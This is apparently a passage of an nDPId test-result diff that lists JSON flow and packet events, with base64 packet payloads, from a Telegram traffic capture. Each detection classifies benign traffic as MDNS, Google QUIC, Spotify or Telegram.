+00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":720,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1588779596464,"flow_last_seen":1588779631710,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":641,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1588779631710,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 01070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1588779632305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779632305,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsdQUAAEARQgfAqAFN\/\/\/\/\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"} 
01067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1588779632305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779632305,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsvq0AAEARNbfAqAFNwKgB\/0RcRFwB2JlBeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1588779632315,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779632315,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABES\/gAAEARqizAqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1588779634762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634762,"pkt":"EBMx8Tl2KDc3AG3ICABFAAViWJsAAEARtXvAqAFN2DrNRPIWAbsFTgTHw1EwNDZQozVJE19KlwkAAAABdLDg+WGAhzOZu62GoAEEAENITE8ZAAAAUEFEAPUBAABTTkkAAwIAAFNUSwA5AgAAVkVSAD0CAABDQ1MATQIAAE5PTkNtAgAAQUVBRHECAABVQUlEoAIAAFNDSUSwAgAAVENJRLQCAABQRE1EuAIAAFNNSEy8AgAASUNTTMACAABOT05Q4AIAAFBVQlMAAwAATUlEUwQDAABTQ0xTCAMAAEtFWFMMAwAAWExDVBQDAABDU0NUFAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS
0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cuZ29vZ2xlLmNvbfji0b2UKZEBPixRS8R5FV4DZD4i7T\/6B0Z4nKaYTElCcNQLL0+vajT\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"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634762,"flow_last_seen":1588779634762,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634762,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1588779634764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634764,"pkt":"EBMx8Tl2KDc3AG3ICABFAAViUS0AAEARvOnAqAFN2DrNRMaGAbsFTkE+w1EwNDZQdSQ0JxgV+\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\/oTfYVDM1unv0Eg0xlJTYVZkAAAAAQAAAEMyNTXvR+qpngpSje9H6qmeClKNYDLLkqBBTd8GdwAAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779634764,"flow_last_seen":1588779634764,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1588779634764,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"beta Chrome\/83.0.4103.34 Intel Mac OS X 10_13_6"}} 
02263{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1588779634794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634794,"pkt":"KDc3AG3IEBMx8Tl2CABFAAViAABAADcR1xbYOs1EwKgBTQG78hYFTlCg01EwNDYFozVJE19KlwkAAAABlFnOyl1IE6Kl9p2lJqJe20wr+YJJK3OQaQI+K1yyeZR9yLW3lS\/Tdnt9xcKqAlOjTi1OwA2w6a7+tRtr3KAKpiTPSke9Qgxq9RZuUGOobpscabZyRsqHgng7hPe2XFawQxldFDSjxKnYQdE5FFv9BpDrnq\/TTXf9TFvgw\/QnXVAz5Cyt9UqBUF1hH0e8eHxu6vo8lxkhnIhe5h6hLOoAm1BnioEr9hnRo4ORCSZRNuTGnhroEuVGyj5HhhPz45sTADcZH\/aRhJy7qwSQPpjxKMRjwHfkXW+yFpSOG3Hp5CsHedxutEJhnZDI+4BG1I6mpoDE8Zvk+SOrrxTdABEKpyABqDKs78QbQi9n46y46LF2JTAo36T9cjW0OkfnS1dX8RBGe5tpl\/GX8HAEOsAa\/z+6O4B5WSOIZhf34xGOy\/N3OFC+u9lN+ttVyLf++3WOzpd57ZzPwtC+yE\/BNwbA4eO5JHsp6kPUffzjzL5K4L4obRfRfmFzgUJr2AvlNCCKETOUv9FcgCj+O3Ce2J+FzvWWvPIvOKN37xrUN\/mjFcjn6vrnzc3WHSBHZUUQPgLL9gdUFNa8\/yQjJhbGLlt8bvQA1SJaoWXDVmYJjnjFSJJFF8RWpizfJP35dxquwrjEwUged8l6McoK7qHu4Ld19f6o8UJyTgkxjnhmujMkW40UK64Bo1F6vaXjIzepbsvzrfPs4buhFyCPcm2wLFZq5nMbYvmNgbBAMNYgQ7+Y4Zo47U6dIvcnsHay4b8rdIZC\/Ra4RUg2MEAVMY04nZVwsS9kMvxjw7tWpuLXdlQCjlvuGOf6dZ6k9rHdaI3URstXL6UuWo0Gdj\/NtiaGySmIHVV6i7EbmaJp3uFyYDnUvrIMjfc6ghlolVGsZni+GAZQbXnpWH5ualh+GQk\/IS2IEz0uyBJ6dsYticBr8EFAQR7hHY\/3OyEr27WwpwoLmUJn9UQqUUNET0+qTxL027bZTqGeTGLe2rH0z4qd78Ue12s\/mmitdGeaTOEIB+kN9Oz976ydi7i+SoMBr\/+hKLj5gjHsfiNqAK8opkFFxqyBh0nqOBdwUSl8gZVmShAcuOo649XW2Yut5pCeSZfn3ZoRq+lWx89wdySCjOMW8exEEWunv6bjn3slpy7AmRkw+sPRuDmUtrstSTMggBfN+zYz4kU9msu81pr+IK0y7aQh4mmTipBI3toWvtKGgxtFFCU+90ZF+2e26g7ax+JPhJWCf1aeqV2qjVTswyDUe+X8YVqx5YC7ACn0pIzEQj12x8eSFM60TkG8kXSrR+cBcSE4aaYhrAy3pypcCtMV26Co80JeaaDwDMCwmVAzo0E\/BwpqMknzmJBeyZjvON\/562D3ZU9nDxApe4H14sNeh3KyKanbNvTWcgxWJPs+wQ9X1d9egrD3CNpHov7eGsS9E5PTryqkw6dcr07anAdXKz39OKneC7uTIi2xMN4pi9HDUne9kKxezY6JaiaaEds0Egs5TrKu5MlMzp7QSr1MmDFu7VQ
LrafQLtQSQLw0f+CkdiOkRSoewADHR7WnRu3Pw\/1y7ALeor+7d7v\/xVkXtV0+u1JaX2B1bUYYuBQruUl0bp5QCHut4tI5G7u+9P1dYnUX\/rSklohEaFv70M62kLeKCl4bX8BdPalaH0yKRZF9q2iCLDdluLwx+pd3G8lRNNpU8gMggNTI9z\/7Pxs0oOqfN32KINp0rOMXmr0ZD6E5U7SeSuShxUVrIQgXkF5QTsc4zAeYQXZrfPFcKANcrPTz3MqQYdpM"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1588779634795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1588779634795,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4emwAAEARmNTAqAFN2DrNRPIWAbsAJN5oQKM1SRNfSpcJAg\/VJy\/hU5JXfMk208XyiTI7oA=="} 02273{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1588779634797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634797,"pkt":"KDc3AG3IEBMx8Tl2CABFAAViAABAADgR1hbYOs1EwKgBTQG7xoYFTqbf01EwNDYFdSQ0JxgV+\/AAAAAB\/upOH6rH2BIyQSeP5oglrVNRjLzUPYUddHT9m6BsmcKmApdlysrOkxHuxx9vijlyM8wYkq7JvX19IQMhKJZA0U6a8sLp7rHlGFo5nqmm0jMnW7WPHt\/LNpmp9sMej9LIYl7HVWlYuGONw23gJgIuAlpWAO6yh+eVnrhPvfDTj31c6\/L1ooPLrq5NV7Gc7jNhPXAjTc4ZaIElGMpTUieuhBDEobdC\/yRUwhIJac7BNwvPjcF+IDwdoZlLRJw3R5oXAi2b\/NF4EAf1KMRYvNmplcTy11GLuiSvRAmihe5Rh\/orc2nsZbWj+vVmUmzCiWHVssa5KLzmBbkyMh6lJPB3gwNR9L\/Fq9yeGKy0+1JnwE4BdYx5u8HLnX2wgYVFT\/rFfn1Oc62CdMeazmAG7K4pybekkUnanBSVSlDsTtacnk6lBahTKCPl4BKZo41FpeNyrCv6CdLYcTHgeBE4YGrMXUeFT\/ilVEPrTMzFe5kzHIStA3AKnuB\/P+S0D02eLWMotPjv93++mmxST6HP114UWR5QNEIWRxUS8RL0hQeu4zY97Ng6cw4CKN+Csj\/ZvkP4kxD\/Zq7tP6yj9mYvYIO9zExfP9oeGiwS\/4f+6unIp0FdFoZmq8bqYOIOw8QtYVOoNnStryjcigG\/awK2ZaMXV+46Pnbc7phNOyTwsLBxxc\/12QJJ45cSQCeX9fI3HOGC6Lef+EyN3wVq9oB+wBoxI5umm0icT\/zZ2yvFo6UFJ2uDstyecW1AqbCfnn6WWr
QLz6eMr+vL\/JleVbbatuBYa5gdk2Yt+67fkdck3Dk3mkph8oGaf+SDkR7Tf9p8ulHM4RwOnQJFlNf4xkSWeQGBLD6wjBE4rkLONEpat+rbynMjiBPAofixsPnISwVDLf0nq9DMrjUvdWlIIMyhGej2e24qnTkMu6p7FC\/huIoB0mRmYhHnBPlCQn\/LUzArFEcNys29X1cxw25iplZFvHkHdOc24AY5G54G00MdsxNdaE\/paJZz93dfFlaEUpxXdsPnTzUS4pfi+tXdLdZlCDSCbcoeLXsZ10o3zvR7bkNwPdSYObv6FtEohnNHd5N8A7GThnHg9zUXltLPSF3xHvq8673iVUYgBtPyG5IX44udpmQI7jeus04VvFTz2gu4npRTD34iJ0hoN0ntT0nFkqcX5\/lL09qWjNDuFP\/S1ls4UAok+2ha5s3PvhtAKIlco7aoWYLrSj95gTSsEvt+vv6BHLLnycSfEmJgy7LNVNyoUK4C4+9WgT1JfWOmVbGaY23xkwzP15QjiTTdKIEkJwiBmgJIruM0dA1J41jJPUcFpH8opFJyrh1InbMhpwrdsem5Er87sEkX0BhYPXkyvKucSZm6W1RMofNDgCdyw5TOBfDKdoqNmc54r82qBE2FvdTks67OsedSUGg\/xIKev6elshEbqcaKfcXRRyuerRJ9Na1ZC85buNS0\/0S8Uk1MnuNcWLIniDOgLmxDYioY8+6ffXPskGoeJ6mpsWIPFN\/ZXPivRS+0hFla3abk42RYHrYiht3fXvADKY3mvEEwWMSzU84L2ho8ij4vLNJYBjTvbpsEkPGMqANA85Spe5XJ9p4g9hQurfHWfSLDKdhStCgrn8jpcM\/\/FkUBZViwdPAW2JLOvsdSXQXeDGKI7nTEgI0kYpnr4frOKaPCHqb3HEqFHSRiARTSD0ufyxhTd6AYnG3WyBQ7hHD\/6lTnreRmZxISZ6q\/gFRJTubvR8\/BO8IvV1XaeMgD55oE\/mi7ALMHyuc8OmMt"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1588779634797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1588779634797,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4M8YAAEAR33rAqAFN2DrNRMaGAbsAJKIhQHUkNCcYFfvwAo2OXEY+ceV4qFvU3oSjW1YxGw=="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1588779636498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1588779636498,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABIkKQAAEARZWTAqAFNwKgB\/+EV4RUANJmxU3BvdFVkcDBukus1wI\/JPgABAARIlcIDfp+BivWMmwGHLE6mtUd\/uj\/4zNc="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABETKwAAEARCJTAqAFNW2wICG32AhEAMEyhL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8Sf7Krq21RXQ=="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEp8EAAEARpYXAqAFNW2wQAW32AhEAMJ\/zL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9gDcREEDsyHQ=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
